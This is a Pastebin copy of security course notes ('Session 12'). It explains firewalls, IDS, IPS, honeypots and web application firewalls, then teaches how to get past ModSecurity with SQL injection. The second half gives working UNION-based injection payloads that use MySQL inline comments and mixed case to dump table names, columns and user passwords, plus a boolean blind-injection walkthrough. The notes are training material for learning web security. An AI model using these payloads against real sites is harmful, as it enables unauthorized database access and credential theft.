API tools faq
paste
sm4rtn0bit4

D-12

sm4rtn0bit4
Feb 7th, 2019
154
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 5.64 KB | None | 0 0
raw download clone embed print report
  1. SESSION 12
  2. ============
  3.  
  4. INTRODUCTION TO FIREWALLS , IDS , IPS
  5. ======================================
  6.  
  7. FIREWALLS
  8. ==========
  9. A firewall is a component which is used to filter the incoming and outgoing OR the inbound and outbound rules of a particular network. A firewall is having a database of signatures for the data packets moving inside or outside of a Network. The data packets moving in a Network Traffic having a malicious content can be blocked by a firewall according to the rule sets created by a Network Administrator.
  10.  
  11. TYPES OF FIREWALLS
  12. ===================
  13. 1. Softwares Based Firewalls : These are the firewalls which is in the form of a application or a software which is having a rulesets of Inbound and Outbound Traffic coming from a Network. Eg. Windows Firewalls , LInux Firewalls - IP Tables.
  14.  
  15. 2. Hardware Based Firewalls : A hardware based firewall is a peripheral which is having a system box with a processor and giving us a Configuration Panel and having more advanced features from a Software Based Firewalls.
  16. Eg. Juniper, Sophos, Endian etc.
  17.  
  18. IDS
  19. ===
  20. IDS stands Intrusion DEtection System, it is a software or a hardware based program which detects every suspicious activity and create a log for it. It can also create the logs and send immediately to the Network Administrator so that they can find out that there is a Intruder in our network.
  21. It can be determined in different types such as NIDS (Network IDS), HIDS (Host IDS), WIDS(Wireless IDS) etc
  22.  
  23. IPS
  24. ===
  25. IPS stands for Intrusion Prevention System, it acts and works by preventing the intruders which have been doing malicious and illegal activities in the Nretwork or with there clients immediately.
  26.  
  27. EG. of IDS and IPS - SNORT etc.
  28.  
  29. HONEYPOTS
  30. =========
  31. A honeypot is a attracting and luring technique to fetch and traps a Hacker, Attacker or a victim which can be a WEb Application, a Network System or a Access Point(Wireless Connection) which seems like absolutely normal but is created to trap the Attackers.
  32.  
  33. ------------------------------------------------------------------
  34.  
  35. MISCOFIGURED WAF
  36. =================
  37.  
  38. INTRDUCTION TO WAF - A web application firewall is just like a network firewall works with the rulesets of inbound and outbound but not for a network, and works for a web application or a web site. A WAF filters the HTTP, HTTPS traffic along with the communication handeling done by TCP/UDP and also works with some advanced mitigation programs like securing OWASP Top 10.
  39.  
  40.  
  41. FOR EG . MOD SECURITY
  42.  
  43. ----------------------------------------------------
  44. INSTALLING AND CONFIGURING MOD SECURITY WAF (JUST FOR REFERENCE)
  45. ================================================================
  46.  
  47. OS - UBUNTU 14.04
  48.  
  49. Mod Security WAF
  50.  
  51. ------------------------------------------------------------------------------------------
  52.  
  53. BYPASSING MOD WAF
  54. ==================
  55.  
  56.  
  57. union select
  58. /*!uNiOn*/ /*!SelEcT*/
  59.  
  60. /*! > STARTING
  61. */ > ENDING
  62.  
  63. Steps :-
  64.  
  65. = Finding GET Method.
  66. = Generating SQL Syntax Error by (‘)
  67. = To check the number of columns by ORDER BY.
  68. = Getting Vulnerable Columns UNION SELECT.
  69. = Getting a error in finding out the Vulnerable Columns.
  70.  
  71.  
  72. Inline Executable Comments -
  73.  
  74. query sanjeev
  75.  
  76. start - /*!
  77. end - */
  78.  
  79. with Inline Executable Comments - /*!sanjeev*/
  80.  
  81. Changing the Case Sensitive things
  82.  
  83. union select > uNiOn SeLECt
  84.  
  85.  
  86. Inline Executable Comments
  87. ---------------------------
  88. Union - /*!UniOn*/
  89. Select - /*!SelECt*/
  90. But these will only work if the DB version is less than 6. The version is always be in Decimal Notation, we can write them by removing the period (.) also. Eg. 5.00.00 -> 50000
  91.  
  92. So for finding out that the Inline Comments can work or not, we have to put the Database Version with Union Select like :
  93.  
  94. = php?id=1' /*!50000UniOn*/ /*!50000SelECt*/ 1,2--+
  95.  
  96. = To get the database and version :
  97. /*!50000UniOn*/ /*!50000SelECt*/ database(),version()--+
  98.  
  99. = To get the table name from information_schema :
  100. /*!50000UniOn*/ /*!50000SelECt*/ 1,table_name from /*!50000Information_schame.tables*/--+
  101.  
  102. = To get the column name from users table :
  103. /*!50000UniOn*/ /*!50000SelECt*/ 1,column_name from /*!50000Information_schame.columns*/ where table_name="users"--+
  104.  
  105. = To get the data:
  106. /*!50000UniOn*/ /*!50000SelECt*/ 1,/*!50000Group_concat(User_id,Users,Password)*/ from users--+
  107.  
  108. --------------------
  109.  
  110. BLIND BASED SQL INJECTION
  111. ==========================
  112.  
  113. Blind Based sql injection is a tyupe of attack vector of sql injection which doesn't gives us any SQL Syntax Error, but can be possibly done.
  114. If there is some data in the web qapplication, it will show the data, else it will reload the same page.
  115.  
  116. STEPS
  117. =====
  118. 1. Finding the GET Method
  119. 2. Finding the vulnerability by (')
  120. 3. Finding the number of columns in the database by doing ORDER BY in any ID in which we get Data.
  121. 4. Finding the Vulnerable column by Union Select.
  122. 5. Same steps further as Union Based SQL Injection.
  123.  
  124. Demo of Blind Based Boolean
  125. ============================
  126. 1
  127. 1'
  128. 1' and 1=0 # ---> False
  129. 1' and 1=1 # ---> True
  130. 1' and 1=0 order by 1 # --> No Result ---> Generic error
  131. 1' and 1=1 order by 1 # --> Result --> normal result
  132. 1' and 1=0 order by 2 # --> No result
  133. 1' and 1=1 order by 2 # ---> Result
  134. 1' and 1=0 order by 3 # ---> No Result
  135. 1' and 1=1 order by 3 # ---> No Result ---> True ---> there are 2 number of columns
  136. 1' and 1=0 union select 1,2 #
  137. 1' and 1=1 union select 1,2 #
  138.  
  139. and so on.
  140.  
  141. TASK
  142. =====
  143. 1. PoC on Blind Based SQL Injection .
  144. 2. List of 10 WAF.
  145.  
  146.  
  147.  
  148. WAF ARTICLE : http://www.tamilbotnet.com/2016/06/sql-injection-web-application-firewall-bypassing-in-tamil.html
Add Comment
Please, Sign In to add comment
Public Pastes
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!